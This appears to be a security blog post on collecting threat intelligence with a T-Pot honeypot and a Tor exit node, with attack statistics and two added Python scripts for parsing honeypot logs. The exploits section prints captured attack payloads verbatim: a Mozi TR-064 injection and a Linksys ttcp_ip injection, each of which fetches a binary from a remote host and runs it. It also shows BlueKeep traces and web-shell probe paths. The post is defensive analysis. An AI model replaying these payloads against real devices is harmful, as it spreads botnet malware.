Threat intelligence, building your citadel


~ 5 minute read
Crafted : 3 months ago Updated : 3 months ago
Tags:
#infosec #information-security #vulnerability #threat-intelligence #honypot #tor #exit-node

Hello Luvs,

This post is just a brain dump on data intelligence and flying packets. Packets aren't the only source of data, but this post is mostly about packets. I'll give you pieces of information here and there; you connect the dots.


It starts with packets. 

Security companies, security researchers, and governments are all digging through packets. We can extract a lot of information from packets, but the first question is where and how to get the right packets?! As a side project during the past month, I tried to gather some data to conduct a few analyses. Here is what I did.

 

  • Managed a honeypot
  • Ran a Tor exit node and passively logged packets


Honeypot


This one is interesting. I was thinking about combining various honeypots to maximize the amount of data we can gather, and, not so surprisingly, someone had already done it before, and they did it right!

T-POT 

T-Pot is based on the network installer Debian (Stretch). During installation, the whole system will be updated to Debian (Sid). The honeypot daemons, as well as other support components being used, have been containerized using docker. This allows us to run multiple honeypot daemons on the same network interface while maintaining a small footprint and constrain each honeypot within its own environment.

In T-Pot, we combine the dockerized honeypots ...

Omg, that's what I've been looking for. So here is what I did: I created a Debian 9.7 (Stretch) machine in the cloud and ran this.

git clone https://github.com/dtag-dev-sec/tpotce
cd tpotce/iso/installer/
./install.sh --type=user


And that's it: we have a fully functional honeypot with a beautiful Kibana dashboard to help us analyze the data.


Tor Exit node

All you need to do is head to https://tor-relay.co. They will hold your hand and even tell you which hosting providers allow Tor exit nodes. This picture shows you what's going on.


Show me some data

Attack by country and percentage of known attacker IPs

Attack by country and ports


Most used username and password 
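The "most used username and password" view above comes straight from T-Pot's Kibana dashboard. As an added example that is not part of the original post or of T-Pot itself, here is how the same tally can be produced directly from Cowrie's JSON log with a few lines of Python. The log lines are constructed to mimic Cowrie's format (the field names eventid, src_ip, username and password are Cowrie's real ones; the values are made up), and the function names are this example's own.

```python
"""Tally the most-used credentials and busiest source IPs from Cowrie JSON logs.
Added example, not part of the original post or of T-Pot/Cowrie. The log lines
below are constructed to mimic Cowrie's JSON format; the field names follow
Cowrie's schema, the values are made up."""
import json
from collections import Counter

# Constructed sample log lines (not real captures).
SAMPLE_LOG = """\
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.7", "username": "root", "password": "123456", "timestamp": "2020-01-02T10:00:01Z"}
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.7", "username": "root", "password": "admin", "timestamp": "2020-01-02T10:00:02Z"}
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.9", "username": "admin", "password": "admin", "timestamp": "2020-01-02T10:01:00Z"}
{"eventid": "cowrie.login.success", "src_ip": "203.0.113.9", "username": "root", "password": "123456", "timestamp": "2020-01-02T10:01:05Z"}
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.9", "timestamp": "2020-01-02T10:01:00Z"}
{"eventid": "cowrie.login.failed", "src_ip": "192.0.2.44", "username": "root", "password": "123456", "timestamp": "2020-01-02T10:02:00Z"}
"""

# Only these two event types carry a credential pair.
LOGIN_EVENTS = {"cowrie.login.failed", "cowrie.login.success"}


def parse_cowrie(text):
    """Yield login-attempt records, skipping non-login events and malformed lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # truncated/corrupt line: skip it rather than abort the whole run
        if rec.get("eventid") in LOGIN_EVENTS and "username" in rec and "password" in rec:
            yield rec


def credential_stats(text, top=5):
    """Return (top credential pairs, top source IPs, successful logins)."""
    creds = Counter()
    sources = Counter()
    successes = []
    for rec in parse_cowrie(text):
        creds[(rec["username"], rec["password"])] += 1
        sources[rec["src_ip"]] += 1
        if rec["eventid"] == "cowrie.login.success":
            # The honeypot let the attacker in: these sessions deserve a closer look.
            successes.append((rec["src_ip"], rec["username"], rec["password"]))
    return creds.most_common(top), sources.most_common(top), successes


if __name__ == "__main__":
    pairs, ips, ok = credential_stats(SAMPLE_LOG)
    print("Top credentials:")
    for (user, pw), n in pairs:
        print(f"  {n:>4}  {user}:{pw}")
    print("Top sources:")
    for ip, n in ips:
        print(f"  {n:>4}  {ip}")
    print("Successful logins (honeypot accepted):", ok)
```

Point it at a real cowrie.json by reading the file into the text argument; the successful-login list is the one to chase first, because those sessions are where the downloaded samples and typed commands show up.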


More Details 

Here is what's going on in one of my honeypots in less than 3 weeks (attacks per honeypot daemon):

  • Dionaea - 3,415,160 attacks
  • Cowrie - 1,652,109 attacks
  • Honeytrap - 652,505 attacks
  • Heralding - 502,539 attacks
  • Rdpy - 39,614 attacks
  • Tanner - 7,167 attacks
  • Adbhoney - 3,885 attacks
  • Mailoney - 3,480 attacks
  • Ciscoasa - 1,203 attacks
  • ElasticPot - 54 attacks


Exploits and Vulnerabilities 

Here are some example exploits we see in the logs.


For example, we can see Mozi still actively trying to infect various hosts. 


<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


The other attempts are the recent BlueKeep exploit; look for MS_T120 in the dump.

........e............0 ..."............................0 ........................... ....0 ........................................|............Duca.......... .X.........( ..r.d.p.s.c.a.n………………………………………………………………………………………………………………………………………………………………………………………….MS_T120.....


Linksys E-series - Remote Code Execution


ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mipsel%3B+wget+http%3A%2F%2F94.177.249.95%2Fmipsel%3B+chmod+777+mipsel%3B+.%2Fmipsel+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


Brute Force

Both directory guessing and password spraying. They also love brute-forcing the MSSQL SA account, just like in the '90s. Directory brute force is used to find other people's web shells or a vulnerable file.


...

/no1.php

/9678.php

/5678.php

/wuwu11.php

...

Blackhat SEO attempts


www.google.co.jp:80 with data b'GET /search?complete=0&hl=en&q=site%3Ajp+inurl%3A%22mackerel7%22+%22.aspx%3Fid%3D%22&num=100&start=0&

 

Too much data; how do we handle it?

Well, it really depends on how deep you want to search, but usually we can start by gathering the obvious stuff like URLs, downloading the files and analyzing them. Most of the downloaded files are simply bots or other kinds of malicious tools. Also, sometimes you may reverse the main function and find a kill-switch HTTP URL, as in WannaCry.
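Pulling the obvious stuff out of captured payloads can be automated. As an added example that is not part of the original post, the Python below decodes the two payloads shown earlier (the TR-064 SetNTPServers request and the Linksys ttcp_ip form body, both copied from this post), flags the fields that carry shell metacharacters where a hostname or IP address should be, and extracts the download URLs so they can be queued for sandboxing or a blocklist. The function names and regexes are this example's own. One caveat a parser writer will hit: the captured TR-064 request is not well-formed XML (the "&&" is unescaped), so a strict XML parser rejects it while the router's lax parser does not, which is why tag contents are pulled out with a regex here.

```python
"""Decode captured exploit payloads and pull out the injected commands and the
download URLs they reference. Added example, not part of the original post; the
two sample payloads are the ones shown in the post, the helper names are this
example's own."""
import re
from urllib.parse import parse_qs

# Sample payloads as captured by the honeypot (copied from the post).
MOZI_TR064 = (
    '<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
    'SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body>'
    '<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">'
    '<NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m '
    '&& chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1>'
    '<NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3>'
    '<NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5>'
    '</u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>'
)
LINKSYS_FORM = (
    "ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mipsel%3B+wget+http%3A%2F%2F94.177.249.95%2Fmipsel%3B"
    "+chmod+777+mipsel%3B+.%2Fmipsel+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button="
    "&change_action=&commit=0&StartEPI=1"
)

# Characters that never belong in an NTP server name or a ttcp target address.
SHELL_META_RE = re.compile(r"[`;|&$]")
# The captured SOAP body is not well-formed XML (unescaped "&&"), so a strict XML
# parser rejects it while the router's lax one does not: pull tag contents by regex.
NTP_FIELD_RE = re.compile(r"<(NewNTPServer\d+)>(.*?)</\1>", re.S)
# Stop a URL at whitespace, quotes, backticks and shell separators.
URL_RE = re.compile(r"""https?://[\w.\-]+(?::\d+)?(?:/[^\s'"`<>;&|]*)?""")


def tr064_injected_commands(soap_text):
    """Return the text of every NewNTPServerN field that carries shell metacharacters."""
    return [text for _name, text in NTP_FIELD_RE.findall(soap_text)
            if SHELL_META_RE.search(text)]


def form_injected_commands(body):
    """Return (field, decoded value) for every form value that carries shell metacharacters."""
    hits = []
    for key, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:  # parse_qs already undoes the %XX and '+' encoding
            if SHELL_META_RE.search(value):
                hits.append((key, value))
    return hits


def extract_urls(text):
    """Unique URLs in the text, sorted for stable output."""
    return sorted(set(URL_RE.findall(text)))


def extract_iocs(payload):
    """Decode a captured payload (SOAP or form body) and return the injected commands
    and the URLs they try to fetch. URLs are taken from the commands only, so the
    SOAP schema URLs in the envelope never pollute the result."""
    text = payload.strip()
    if text.startswith("<"):
        cmds = tr064_injected_commands(text)
    else:
        cmds = [value for _key, value in form_injected_commands(text)]
    return {"commands": cmds, "urls": extract_urls(" ".join(cmds))}


if __name__ == "__main__":
    for label, payload in (("TR-064 (Mozi)", MOZI_TR064), ("Linksys ttcp_ip", LINKSYS_FORM)):
        iocs = extract_iocs(payload)
        print(f"{label}: {len(iocs['commands'])} injected field(s), download URLs: {iocs['urls']}")
```

Feed it the raw request bodies your honeypot stored and the "urls" list becomes the download queue; a field that matches SHELL_META_RE but yields no URL is still worth keeping, since it may be the second stage of a multi-request chain.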


Conclusions

Blackhats aren't so smart?

Aren't they now? Well, most of the attackers we see in the honeypot packets are script kiddies running public (and mostly outdated) exploits in the hope of scoring something. There has also been a debate on infosec Twitter about banning offensive security tools because a lot of attackers are dumb and can't create their own tools and scripts. It may sound correct, but unfortunately that's not the case; there are also skilled cyber actors out there. That's why, as I said on Twitter earlier: if your security solution really can't detect unobfuscated or slightly obfuscated PowerShell scripts, either your organization isn't trustworthy, or your security solution is, duh! Defensive companies have to keep up with offensive techniques and tools; in the long run, releasing offensive security tools and exploits (not dropping 0days, and at the right time) will bring nothing but more security.

There is more 

As I said in the beginning, this setup will not record everything.

Here is what you ideally want.

Basically, you want to parse everything into a logging center; next, using ML, you can extract almost anything, from 0days to even "predicting someone's next password" ;) You can also correlate logs with each other, from leaked databases to honeypot logs. As a side project my resources are minimal, but for someone with deep pockets, and for better results, you want to have a server in each region and country (just like VPN servers) to make sure you can even capture targeted attacks. So now what? Well, now that you have built your own threat intelligence empire, it's time to cleanse the data and make sense of it.

Be very careful, my friends: "with great power comes great responsibility." Do not abuse your knowledge; instead, contribute to people's privacy and security.

 

PS: If you are a legit security researcher or company and would like to access my honeypot or node data, feel free to contact me.

Happy new year, and happy hunting.
